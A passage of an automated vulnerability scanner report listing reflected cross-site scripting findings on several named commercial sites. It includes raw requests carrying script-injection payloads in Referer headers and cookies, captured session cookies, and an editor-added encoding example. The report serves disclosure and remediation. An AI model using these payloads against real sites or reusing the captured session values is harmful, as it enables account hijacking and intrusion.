Set-Cookie: browser_id=121983128284; expires=Saturday, 20-Feb-2021 23:12:51 GMT; path=/
Set-Cookie: browser_id=121983128284; expires=Saturday, 20-Feb-2021 23:12:51 GMT; path=/
Set-Cookie: browser_id=121983128284; expires=Saturday, 20-Feb-2021 23:12:51 GMT; path=/
Set-Cookie: browser_id=121983128284; expires=Saturday, 20-Feb-2021 23:12:51 GMT; path=/
Set-Cookie: sr_token=null; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 99408

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<!--Preview TimeZone = 'null' --><!--Preview TimeZone = 'Amer
...[SNIP]...
<IFRAME src="http://fls.doubleclick.net/activityi;src=2898044;type=homep506;cat=homep686;u1=;u2=1;u3=;u4=;u5=dbff4"><script>alert(1)</script>4ecff407bde;u6=;u7=;ord=1;num=1964877?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0>
...[SNIP]...

1.508. http://www.espnshop.com/family/index.jsp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.espnshop.com
Path:   /family/index.jsp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8122"><script>alert(1)</script>a4e893c3c6d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
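Added example for the two HTML contexts in this report: the HTML comment of 1.504 and the double-quoted attribute value of 1.505, 1.507 and 1.508. This is editor-written illustration code, not code from 4shared.com, addthis.com or espnshop.com, and the two templates are assumed reductions of the responses shown. It places the report's own Referer payloads into a plain concatenation and into an encoded one, then counts the start tags each output contains and checks whether the comment is still closed by the template's own terminator.

```javascript
// Editor-added example; the templates are assumed reductions, not the sites' code.

// Entity-encode a value for a quoted HTML attribute. Every character that can
// end the attribute value or begin markup becomes a character reference.
const ENTITIES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
function encodeForHtmlAttribute(value) {
  return String(value).replace(/[&<>"']/g, (ch) => ENTITIES[ch]);
}

// Encode a value for the inside of an HTML comment. The tokenizer ends a comment
// only at "-->" (or the "--!>" recovery form) and never decodes entities inside
// one, so replacing ">" is what keeps the comment closed; "<" and "&" are
// replaced too so the text cannot read as markup if it is ever copied out.
function encodeForHtmlComment(value) {
  return String(value).replace(/[<>&]/g, (ch) => ENTITIES[ch]);
}

// Assumed reduction of the addthis.com response (1.505): the Referer written
// into a double-quoted attribute, unencoded and encoded.
function renderHiddenUrlUnsafe(referer) {
  return '<input type="hidden" id="url" name="url" value="' + referer + '" />';
}
function renderHiddenUrl(referer) {
  return '<input type="hidden" id="url" name="url" value="' + encodeForHtmlAttribute(referer) + '" />';
}

// Assumed reduction of the 4shared.com response (1.504): the Referer in a comment.
function renderRefCommentUnsafe(referer) {
  return '<!--// ref:' + referer + '-->';
}
function renderRefComment(referer) {
  return '<!--// ref:' + encodeForHtmlComment(referer) + '-->';
}

// Number of start tags in a fragment. A correctly encoded value can never add
// one beyond those the template itself emits.
function countStartTags(html) {
  return (html.match(/<[a-zA-Z]/g) || []).length;
}

// True when the first "-->" in the fragment is the template's own terminator,
// i.e. the value did not close the comment early.
function commentStaysClosed(html) {
  return html.indexOf('-->') === html.length - 3;
}

// Payloads copied from the report; constructed Referer values, not live traffic.
const ATTR_PAYLOAD = 'http://www.google.com/search?hl=en&q=edc49"><script>alert(1)</script>ac11e21fa42';
const COMMENT_PAYLOAD = 'http://www.google.com/search?hl=en&q=8177c--><script>alert(1)</script>e023ffda58';

// Summarise what each template does with the report's payloads.
function surveyHtmlContexts() {
  return {
    attrUnsafeTags: countStartTags(renderHiddenUrlUnsafe(ATTR_PAYLOAD)),             // 2: input + injected script
    attrSafeTags: countStartTags(renderHiddenUrl(ATTR_PAYLOAD)),                     // 1: input only
    commentUnsafeClosed: commentStaysClosed(renderRefCommentUnsafe(COMMENT_PAYLOAD)), // false
    commentSafeClosed: commentStaysClosed(renderRefComment(COMMENT_PAYLOAD)),         // true
    commentSafeTags: countStartTags(renderRefComment(COMMENT_PAYLOAD)),               // 0
  };
}
```

The comment encoder deliberately does not try to be clever about "--": the only sequences that end a comment contain ">", so encoding that character is sufficient, and the attribute encoder also covers the single quote so the same function is safe for single-quoted attributes.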

Request

GET /family/index.jsp HTTP/1.1
Host: www.espnshop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: d8122"><script>alert(1)</script>a4e893c3c6d

Response (redirected)

HTTP/1.1 200 OK
Date: Wed, 23 Feb 2011 23:10:32 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: JSESSIONID=lWYRNlTLGNR9jn9VGyyTTgTJMVLK6GvkY3pPW5srfPChNGdZ6zG8!-621544071; path=/
Set-Cookie: browser_id=121983342444; expires=Saturday, 20-Feb-2021 23:10:32 GMT; path=/
Set-Cookie: browser_id=121983342444; expires=Saturday, 20-Feb-2021 23:10:32 GMT; path=/
Set-Cookie: browser_id=121983342444; expires=Saturday, 20-Feb-2021 23:10:32 GMT; path=/
Set-Cookie: browser_id=121983342444; expires=Saturday, 20-Feb-2021 23:10:32 GMT; path=/
Set-Cookie: browser_id=121983342444; expires=Saturday, 20-Feb-2021 23:10:32 GMT; path=/
Set-Cookie: sr_token=null; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 99409

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<!--Preview TimeZone = 'null' --><!--Preview TimeZone = 'Amer
...[SNIP]...
<IFRAME src="http://fls.doubleclick.net/activityi;src=2898044;type=homep506;cat=homep686;u1=;u2=1;u3=;u4=;u5=d8122"><script>alert(1)</script>a4e893c3c6d;u6=;u7=;ord=1;num=85317957?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0>
...[SNIP]...

1.509. https://www.rei.com/ForgotPassword [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.rei.com
Path:   /ForgotPassword

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 98fdb</script><script>alert(1)</script>364b6f096e8 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. The payload here does not rely on the string delimiter at all: the HTML parser ends the script element at the first "</script" it sees, before the JavaScript engine ever parses the string, so escaping only quotation marks and backslashes leaves this open. "<" (and "/" in a URL path) must be escaped as \x3c and \x2f as well, or the value emitted through an escaper that encodes every non-alphanumeric character.

Request

GET /ForgotPassword HTTP/1.1
Host: www.rei.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000Vq4EAQo1i3cHWRUeAka9MaR:12c4asuqe; REI_SESSION_ID=50049694244%2CP08sIlh%2BJlQqVVN%2BLyhLNy0uPl41VX5ZMTlOUH5DX18uTU0nM1VNMzxEUCQh; __utmz=104384131.1298667930.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; REI_ANALYTICS_SESSION=opencart~%7Cmclick~%7Csl_seen~%7Cp_f_m~top%20nav%20rei%7Cprev_omni_pagename~membership%3Amain; REI_SSL_SESSION_ID=50049694244%2CP1U%2FKU5UVUdKMiJGXE4uTTBcLUgyQEEvQ0lIV0wuSlVFfjFXTDVPTyZBQCQh; mr_referredVisitor=0; mbox=check#true#1298668042|session#1298667914619-871377#1298669842|PC#1298667914619-871377.17#1299877582; s_vnum=1456347930317%26vn%3D1; s_invisit=true; s_cc=true; IS3_History=1295673914-1-34_1-1-__1_; loggedin=0; IS3_GSV=DPL-2_TES-1298667958_PCT-1298667958_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; s_nr=1298667989949-New; s_vi=[CS]v1|26B40CBD851D0E29-4000012CA035CE9C[CE]; __utma=104384131.673842893.1298667930.1298667930.1298667930.1; rei_user_info=""; __utmc=104384131; stop_mobi=yes; __utmb=104384131.2.10.1298667930;
Referer: http://www.google.com/search?hl=en&q=98fdb</script><script>alert(1)</script>364b6f096e8

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, pre-check=0, post-check=0, private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: policyref="http://www.rei.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMi TAIi IVDo CONo OUR DELa SAMo STP PHY PUR COM NAV INT STA PRE GOV"
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Date: Sat, 26 Feb 2011 02:33:25 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=0000Vq4EAQo1i3cHWRUeAka9MaR:12c4asuqe:12c4b15as; Path=/
Content-Length: 78761

<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:rei="http://www.rei.com/ns/rei"><head><meta http-equiv="Content-Type" content="text
...[SNIP]...
tp://media.rei.com',
   yourAccountInView = 'YourAccountInfoInView?storeId=8000',
   yourAccountOutView = 'YourAccountInfoOutView?storeId=8000',
   pageIsSecure = false,
   referringUrlPath = '/search?hl=en&q=98fdb</script><script>alert(1)</script>364b6f096e8',
   navClass = 'noSidebar ',
   storeClass = 'rei',
   sectionClass = 'yourAccount',
   pageClass = 'content',
   contentClass = '';

returnUrl = currentUrl = location.href;
httpPath = httpHost = jscript_path
...[SNIP]...

1.510. https://www.rei.com/OrderTrackingLoginView [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.rei.com
Path:   /OrderTrackingLoginView

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9f9b2</script><script>alert(1)</script>ce41757f8fb was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /OrderTrackingLoginView HTTP/1.1
Host: www.rei.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000Vq4EAQo1i3cHWRUeAka9MaR:12c4asuqe; REI_SESSION_ID=50049694244%2CP08sIlh%2BJlQqVVN%2BLyhLNy0uPl41VX5ZMTlOUH5DX18uTU0nM1VNMzxEUCQh; __utmz=104384131.1298667930.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; REI_ANALYTICS_SESSION=opencart~%7Cmclick~%7Csl_seen~%7Cp_f_m~top%20nav%20rei%7Cprev_omni_pagename~membership%3Amain; REI_SSL_SESSION_ID=50049694244%2CP1U%2FKU5UVUdKMiJGXE4uTTBcLUgyQEEvQ0lIV0wuSlVFfjFXTDVPTyZBQCQh; mr_referredVisitor=0; mbox=check#true#1298668042|session#1298667914619-871377#1298669842|PC#1298667914619-871377.17#1299877582; s_vnum=1456347930317%26vn%3D1; s_invisit=true; s_cc=true; IS3_History=1295673914-1-34_1-1-__1_; loggedin=0; IS3_GSV=DPL-2_TES-1298667958_PCT-1298667958_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; s_nr=1298667989949-New; s_vi=[CS]v1|26B40CBD851D0E29-4000012CA035CE9C[CE]; __utma=104384131.673842893.1298667930.1298667930.1298667930.1; rei_user_info=""; __utmc=104384131; stop_mobi=yes; __utmb=104384131.2.10.1298667930;
Referer: http://www.google.com/search?hl=en&q=9f9b2</script><script>alert(1)</script>ce41757f8fb

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
P3P: policyref="http://www.rei.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMi TAIi IVDo CONo OUR DELa SAMo STP PHY PUR COM NAV INT STA PRE GOV"
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Date: Sat, 26 Feb 2011 02:33:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=0000Vq4EAQo1i3cHWRUeAka9MaR:12c4asuqe:12c4b1vd3; Path=/
Content-Length: 81914

<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:rei="http://www.rei.com/ns/rei"><head><meta http-equiv="Content-Type" content="text
...[SNIP]...
tp://media.rei.com',
   yourAccountInView = 'YourAccountInfoInView?storeId=8000',
   yourAccountOutView = 'YourAccountInfoOutView?storeId=8000',
   pageIsSecure = false,
   referringUrlPath = '/search?hl=en&q=9f9b2</script><script>alert(1)</script>ce41757f8fb',
   navClass = 'noSidebar ',
   storeClass = 'rei',
   sectionClass = 'yourAccount',
   pageClass = 'content',
   contentClass = '';

returnUrl = currentUrl = location.href;
httpPath = httpHost = jscript_path
...[SNIP]...

1.511. https://www.rei.com/RegistrationView [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.rei.com
Path:   /RegistrationView

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c0a7f</script><script>alert(1)</script>194c19d5de3 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, client-side technologies such as Flash have offered ways to cause another user's browser to make a request containing an arbitrary HTTP header. If such a technique is available, it can probably be leveraged to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /RegistrationView?storeId=8000 HTTP/1.1
Host: www.rei.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; mr_referredVisitor=0; s_vnum=1456347930317%26vn%3D1; __utmz=104384131.1298667930.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|26B40CBD851D0E29-4000012CA035CE9C[CE]; REI_ANALYTICS_SESSION=opencart~%7Cmclick~%7Csl_seen~%7Cp_f_m~top%20nav%20rei%7Cprev_omni_pagename~rei%3Ahome; mbox=check#true#1298668020|session#1298667914619-871377#1298669820|PC#1298667914619-871377.17#1299877560; s_cc=true; s_invisit=true; s_nr=1298667963581-New; s_sq=%5B%5BB%5D%5D; __utma=104384131.673842893.1298667930.1298667930.1298667930.1; __utmc=104384131; __utmb=104384131.2.10.1298667930; IS3_History=1295673914-1-34_1-1-__1_; IS3_GSV=DPL-2_TES-1298667958_PCT-1298667958_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com
Referer: http://www.google.com/search?hl=en&q=c0a7f</script><script>alert(1)</script>194c19d5de3

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
P3P: policyref="http://www.rei.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMi TAIi IVDo CONo OUR DELa SAMo STP PHY PUR COM NAV INT STA PRE GOV"
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Date: Fri, 25 Feb 2011 21:13:52 GMT
Connection: keep-alive
Set-Cookie: JSESSIONID=0000xCvlO4EZ98UIcJYvQqOKN1Z:12c4b2c9i; Path=/
Set-Cookie: REI_SESSION_ID=50049695152%2CP04iNzZJXEAxXDFFTEdNVlFYL0E8WFpDQz08N0JTIS9UP0UxSUpbJlEzQCQh; Expires=Fri, 11 Mar 2011 21:13:52 GMT; Path=/
Set-Cookie: REI_SSL_SESSION_ID=50049695152%2CPy1cQCNMXjU8LldOX0MuLF0%2BVkQ%2BQEUqS006VzU3KVxdTi9dVSZOQX47UCQh; Path=/; Secure
Set-Cookie: rei_user_info=""; Expires=Fri, 11 Mar 2011 21:13:52 GMT; Path=/
Set-Cookie: loggedin=0; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/
Content-Length: 85097

<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:rei="http://www.rei.com/ns/rei"><head><meta http-equiv="Content-Type" content="text
...[SNIP]...
tp://media.rei.com',
   yourAccountInView = 'YourAccountInfoInView?storeId=8000',
   yourAccountOutView = 'YourAccountInfoOutView?storeId=8000',
   pageIsSecure = false,
   referringUrlPath = '/search?hl=en&q=c0a7f</script><script>alert(1)</script>194c19d5de3',
   navClass = 'noSidebar ',
   storeClass = 'rei',
   sectionClass = 'yourAccount',
   pageClass = 'content',
   contentClass = '';

returnUrl = currentUrl = location.href;
httpPath = httpHost = jscript_path
...[SNIP]...

1.512. https://www.rei.com/YourAccountLoginView [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.rei.com
Path:   /YourAccountLoginView

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3303c</script><script>alert(1)</script>112a8f16292 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, client-side technologies such as Flash have offered ways to cause another user's browser to make a request containing an arbitrary HTTP header. If such a technique is available, it can probably be leveraged to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /YourAccountLoginView?storeId=8000 HTTP/1.1
Host: www.rei.com
Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=3303c</script><script>alert(1)</script>112a8f16292
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; mr_referredVisitor=0; s_vnum=1456347930317%26vn%3D1; __utmz=104384131.1298667930.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|26B40CBD851D0E29-4000012CA035CE9C[CE]; REI_ANALYTICS_SESSION=opencart~%7Cmclick~%7Csl_seen~%7Cp_f_m~top%20nav%20rei%7Cprev_omni_pagename~rei%3Ahome; mbox=check#true#1298668020|session#1298667914619-871377#1298669820|PC#1298667914619-871377.17#1299877560; __utma=104384131.673842893.1298667930.1298667930.1298667930.1; __utmc=104384131; __utmb=104384131.2.10.1298667930; IS3_History=1295673914-1-34_1-1-__1_; IS3_GSV=DPL-2_TES-1298667958_PCT-1298667958_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; s_cc=true; s_invisit=true; s_nr=1298667972631-New; s_sq=reiprod%3D%2526pid%253Dmembership%25253Amain%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.rei.com%25252FYourAccountLoginView%25253FstoreId%25253D8000%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
P3P: policyref="http://www.rei.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMi TAIi IVDo CONo OUR DELa SAMo STP PHY PUR COM NAV INT STA PRE GOV"
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Date: Fri, 25 Feb 2011 21:12:40 GMT
Connection: keep-alive
Set-Cookie: JSESSIONID=0000MStu6LtTtW-YcwIHgc0jvu4:12c4av667; Path=/
Content-Length: 81815

<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:rei="http://www.rei.com/ns/rei"><head><meta http-equiv="Content-Type" content="text
...[SNIP]...
tp://media.rei.com',
   yourAccountInView = 'YourAccountInfoInView?storeId=8000',
   yourAccountOutView = 'YourAccountInfoOutView?storeId=8000',
   pageIsSecure = false,
   referringUrlPath = '/search?hl=en&q=3303c</script><script>alert(1)</script>112a8f16292',
   navClass = 'noSidebar ',
   storeClass = 'rei',
   sectionClass = 'yourAccount',
   pageClass = 'content',
   contentClass = '';

returnUrl = currentUrl = location.href;
httpPath = httpHost = jscript_path
...[SNIP]...

1.513. http://a.collective-media.net/cmadj/manta.comp/energy_resources [cli cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/manta.comp/energy_resources

Issue detail

The value of the cli cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6aae1"%3balert(1)//9f276e0ea99 was submitted in the cli cookie. This input was echoed as 6aae1";alert(1)//9f276e0ea99 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/manta.comp/energy_resources;pos=top;sz=1x1,728x90;cmn=mt;pg=comp;sc=e33b9;cs=e00;as=r00;st=sc;ct=camden;s=n;t=energy;t=resources;t=waste;t=disposal;t=refuse;t=systems;t=industrial;t=recovery;t=llc;tile=1;net=mt;ord=9636399718001484;ord1=980367;cmpgurl=http%253A//www.manta.com/c/mtl07lp/industrial-waste-recovery-llc? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.manta.com/c/mtl07lp/industrial-waste-recovery-llc
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11e4f07c0988ac76aae1"%3balert(1)//9f276e0ea99; JY57=3dY1_FHES3TRHCZNmOsvTJNeUatqJcvX7Nq1uKJSzEoZ2NeTOgc4cAw; targ=1; rdst11=1; rdst12=1; dp2=1; dc=dc-sea

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sat, 26 Feb 2011 00:19:23 GMT
Connection: close
Set-Cookie: apnx=1; domain=collective-media.net; path=/; expires=Sun, 27-Feb-2011 00:19:23 GMT
Set-Cookie: nadp=1; domain=collective-media.net; path=/; expires=Sat, 05-Mar-2011 00:19:23 GMT
Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Sat, 26-Feb-2011 08:19:23 GMT
Set-Cookie: qcdp=1; domain=collective-media.net; path=/; expires=Sun, 27-Feb-2011 00:19:23 GMT
Content-Length: 8118

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
</scr'+'ipt>');CollectiveMedia.addPixel("http://ib.adnxs.com/mapuid?member=311&user=11e4f07c0988ac76aae1";alert(1)//9f276e0ea99&seg_code=noseg&ord=1298679563",true);CollectiveMedia.addPixel("http://r.nexac.com/e/getdata.xgi?dt=br&pkey=xkeii93kdn349&reppipe=,&edr=off&repequal=_&ru=http%3A%2F%2Fa.collective-media.net%2Fdatapair%
...[SNIP]...

1.514. http://seg.sharethis.com/getSegment.php [__stid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://seg.sharethis.com
Path:   /getSegment.php

Issue detail

The value of the __stid cookie is copied into the HTML document as plain text between tags. The payload 85e58<script>alert(1)</script>0dca2365492 was submitted in the __stid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /getSegment.php?fpc=c428de2-12e59391fd7-2d50293c-2&purl=null&jsref= HTTP/1.1
Host: seg.sharethis.com
Proxy-Connection: keep-alive
Referer: http://edge.sharethis.com/share4x/index.5c108f5ecedf280ce5fe5e8db7e38332.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CszLBk1bK3ITLgrkJKQWAg==85e58<script>alert(1)</script>0dca2365492

Response

HTTP/1.1 200 OK
Server: nginx/0.8.47
Date: Thu, 24 Feb 2011 19:50:27 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3
P3P: "policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM"
Content-Length: 1195


           <html>
           <head><title>ShareThis Segmenter</title></head>
           <body>
           
           No Segment
           <script type="text/javascript">
                   var ref=document.referrer;var lurl = (("https:" == document.location.p
...[SNIP]...
<div style='display:none'>clicookie:CszLBk1bK3ITLgrkJKQWAg==85e58<script>alert(1)</script>0dca2365492
userid:
</div>
...[SNIP]...
